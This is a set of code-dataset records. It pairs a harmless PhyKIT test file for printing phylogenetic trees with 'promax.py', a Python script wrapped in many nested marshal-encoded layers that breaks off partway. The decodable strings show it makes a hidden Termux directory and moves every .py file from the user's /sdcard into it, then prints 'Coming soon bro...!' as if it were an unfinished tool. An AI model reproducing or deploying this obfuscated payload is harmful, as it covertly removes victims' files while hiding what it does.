complete_apps = ['resume_app'] | 61.380952 | 145 | 0.546031 | 830 | 7,734 | 4.955422 | 0.106024 | 0.124483 | 0.214442 | 0.306346 | 0.800875 | 0.786287 | 0.777535 | 0.752249 | 0.712375 | 0.702164 | 0 | 0.012669 | 0.214119 | 7,734 | 126 | 146 | 61.380952 | 0.664034 | 0.012025 | 0 | 0.382609 | 0 | 0 | 0.556952 | 0.352972 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017391 | false | 0.008696 | 0.034783 | 0 | 0.078261 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e8150724645738b73035163009d56bf05c924f01 | 8,169 | py | Python | tests/integration/tree/test_print_tree_integration.py | yuzhenpeng/PhyKIT | 167b9dfe0dd0bddd4b23492d9a3dc34e56debbd7 | [
"MIT"
] | 26 | 2020-10-28T10:33:33.000Z | 2022-02-04T14:59:22.000Z | tests/integration/tree/test_print_tree_integration.py | yuzhenpeng/PhyKIT | 167b9dfe0dd0bddd4b23492d9a3dc34e56debbd7 | [
"MIT"
] | 4 | 2021-03-28T22:05:39.000Z | 2022-03-22T00:33:01.000Z | tests/integration/tree/test_print_tree_integration.py | JLSteenwyk/PhyKIT | 0b3194d1bb5c189993b256fe96011cce48b9bbb4 | [
"MIT"
] | 4 | 2020-11-06T11:58:25.000Z | 2021-08-17T16:57:51.000Z | import pytest
import sys
from math import isclose
from mock import patch, call
from pathlib import Path
import sys
from textwrap import dedent
from phykit.phykit import Phykit
here = Path(__file__)
@pytest.mark.integration
class TestPrintTree(object):
@patch("builtins.print")
def test_print_tree0(self, mocked_print):
expected_result = """
_________ raccoon
|
|___ bear
|
| _____ sea_lion
| ___|
| | |_____ seal
_|_|
| | _____________________________________________________ monkey
| | __________|
| || |________________________ cat
| |
| |_________ weasel
|
|____________ dog
"""
testargs = [
"phykit",
"print_tree",
f"{here.parent.parent.parent}/sample_files/tree_simple.tre",
]
with patch.object(sys, "argv", testargs):
Phykit()
@patch("builtins.print")
def test_print_tree1(self, mocked_print):
expected_result = """
, Aspergillus_fischeri_IBT_3003
|
, Aspergillus_fischeri_IBT_3007
|
, Aspergillus_fischeri_NRRL181.GCF_0001...
|
, Aspergillus_fischeri_NRRL4585
|
| , Aspergillus_fumigatus_Af293
_| ,|
| || Aspergillus_fumigatus_CEA10
| _____________________|
| | | _ Aspergillus_fumigatus_HMR_AF_270
|_________| ||
| | | Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
| Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"print_tree",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
]
with patch.object(sys, "argv", testargs):
Phykit()
@patch("builtins.print")
def test_print_tree_wrong_input(self, mocked_print):
testargs = [
"phykit",
"print_tree",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tr",
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
@patch("builtins.print")
def test_print_tree_alias0(self, mocked_print):
expected_result = """
, Aspergillus_fischeri_IBT_3003
|
, Aspergillus_fischeri_IBT_3007
|
, Aspergillus_fischeri_NRRL181.GCF_0001...
|
, Aspergillus_fischeri_NRRL4585
|
| , Aspergillus_fumigatus_Af293
_| ,|
| || Aspergillus_fumigatus_CEA10
| _____________________|
| | | _ Aspergillus_fumigatus_HMR_AF_270
|_________| ||
| | | Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
| Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"print",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
@patch("builtins.print")
def test_print_tree_alias1(self, mocked_print):
expected_result = """
, Aspergillus_fischeri_IBT_3003
|
, Aspergillus_fischeri_IBT_3007
|
, Aspergillus_fischeri_NRRL181.GCF_0001...
|
, Aspergillus_fischeri_NRRL4585
|
| , Aspergillus_fumigatus_Af293
_| ,|
| || Aspergillus_fumigatus_CEA10
| _____________________|
| | | _ Aspergillus_fumigatus_HMR_AF_270
|_________| ||
| | | Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
| Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"pt",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
@patch("builtins.print")
def test_print_tree_remove_branch_lengths_short(self, mocked_print):
expected_result = """
____ Aspergillus_fischeri_IBT_3003
|
| ____ Aspergillus_fischeri_IBT_3007
| |
|____| ____ Aspergillus_fischeri_NRRL181.GCF_0001...
| | |
| |____| ____ Aspergillus_fischeri_NRRL4585
| | |
| | | ____ Aspergillus_fumigatus_Af293
_| |____| ____|
| | | |____ Aspergillus_fumigatus_CEA10
| | ____|
| | | | ____ Aspergillus_fumigatus_HMR_AF_270
| |____| |____|
| | |____ Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
|____ Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"print",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
"-r"
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2
@patch("builtins.print")
def test_print_tree_remove_branch_lengths_long(self, mocked_print):
expected_result = """
____ Aspergillus_fischeri_IBT_3003
|
| ____ Aspergillus_fischeri_IBT_3007
| |
|____| ____ Aspergillus_fischeri_NRRL181.GCF_0001...
| | |
| |____| ____ Aspergillus_fischeri_NRRL4585
| | |
| | | ____ Aspergillus_fumigatus_Af293
_| |____| ____|
| | | |____ Aspergillus_fumigatus_CEA10
| | ____|
| | | | ____ Aspergillus_fumigatus_HMR_AF_270
| |____| |____|
| | |____ Aspergillus_fumigatus_Z5
| |
| |____ Aspergillus_oerlinghausenensis_CBS139183
|
|____ Aspergillus_fischeri_NRRL4161
"""
testargs = [
"phykit",
"print",
f"{here.parent.parent.parent}/sample_files/small_Aspergillus_tree.tre",
"--remove"
]
with pytest.raises(SystemExit) as pytest_wrapped_e:
Phykit()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 2 | 34.761702 | 87 | 0.477292 | 546 | 8,169 | 6.03663 | 0.168498 | 0.144114 | 0.063714 | 0.06068 | 0.902609 | 0.893811 | 0.884709 | 0.883495 | 0.883495 | 0.883495 | 0 | 0.044262 | 0.449627 | 8,169 | 235 | 88 | 34.761702 | 0.688835 | 0 | 0 | 0.706731 | 0 | 0 | 0.677356 | 0.260832 | 0 | 0 | 0 | 0 | 0.048077 | 1 | 0.033654 | false | 0 | 0.038462 | 0 | 0.076923 | 0.096154 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e8244eb8cda79c9d9739d03c07acc1e2f7c75938 | 29,778 | py | Python | promax.py | B4BY-DG/BanDuLa | 110eba620bf1381eec5fbabddb1bdb35ca829097 | [
"MIT"
] | null | null | null | promax.py | B4BY-DG/BanDuLa | 110eba620bf1381eec5fbabddb1bdb35ca829097 | [
"MIT"
] | null | null | null | promax.py | B4BY-DG/BanDuLa | 110eba620bf1381eec5fbabddb1bdb35ca829097 | [
"MIT"
] | null | null | null |
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xa9$\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s>$\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xd3#\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sh#\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xfd"\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x92"\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\'"\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xbc!\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sQ!\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xe6 \x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s{ \x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x10 \x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xa5\x1f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s:\x1f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xcf\x1e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sd\x1e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xf9\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x8e\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s#\x1d\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xb8\x1c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sM\x1c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xe2\x1b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sw\x1b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x0c\x1b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xa1\x1a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s6\x1a\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xcb\x19\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s`\x19\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\02\x00\x00\x00s\xf5\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x8a\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x1f\x18\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xb4\x17\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sI\x17\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xde\x16\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00ss\x16\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x08\x16\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x9d\x15\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s2\x15\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xc7\x14\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\\\x14\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xf1\x13\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x86\x13\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x1b\x13\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xb0\x12\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sE\x12\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xda\x11\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00so\x11\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x04\x11\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x99\x10\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s.\x10\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xc3\x0f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sX\x0f\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xed\x0e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x82\x0e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x17\x0e\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xac\r\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sA\r\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x0\x00d\x01\x00S\t(\x02\x00\x00\x00s\xd6\x0c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sk\x0c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x00\x0c\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x95\x0b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s*\x0b\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xbf\n\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sT\n\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xe9\t\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s~\t\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x13\t\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xa8\x08\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s=\x08\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xd2\x07\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sg\x07\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xfc\x06\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x91\x06\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s&\x06\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xbb\x05\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sP\x05\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xe5\x04\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sz\x04\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\x0f\x04\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xa4\x03\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s9\x03\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00s\xce\x02\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00s\x0b\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00S\t(\x02\x00\x00\x00sc\x02\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s1\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x02\x00\x84\x00\x00Z\x01\x00d\x03\x00\x84\x00\x00Z\x02\x00e\x01\x00\x83\x00\x00\x01e\x02\x00\x83\x00\x00\x01d\x01\x00S\t(\x04\x00\x00\x00i\xff\xff\xff\xffNc\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x02\x00\x00\x00Ns(\x00\x00\x00/data/data/com.termux/files/usr/etc/.tr(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x05\x00\x00\x00mkdir(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00mara.pyt\x06\x00\x00\x00folder\x03\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x03\x00\x11\x01\x03\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s0\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x03\x00\x83\x01\x00\x01d\x04\x00GHd\x00\x00S(\x05\x00\x00\x00Nt\x05\x00\x00\x00clears\x15\x00\x00\x00touch /sdcard/null.pys8\x00\x00\x00mv /sdcard/*.py /data/data/com.termux/files/usr/etc/.trxs\x13\x00\x00\x00Coming soon bro...!(\x02\x00\x00\x00R\x00\x00\x00\x00t\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00mara.pyt\x04\x00\x00\x00main\x07\x00\x00\x00s\x08\x00\x00\x00\x00\x01\r\x01\r\x01\r\x01(\x03\x00\x00\x00R\x00\x00\x00\x00R\x02\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00mara.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x08\x00\x00\x00\x0c\x02\t\x04\t\x05\x07\x01N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00done.pyt\x08\x00\x00\x00<module>\x01\x00\x00\x00t\x00\x00\x00\x00N(\x01\x00\x00\x00t\x04\x00\x00\x00azim(\x00\x00\x00\x00(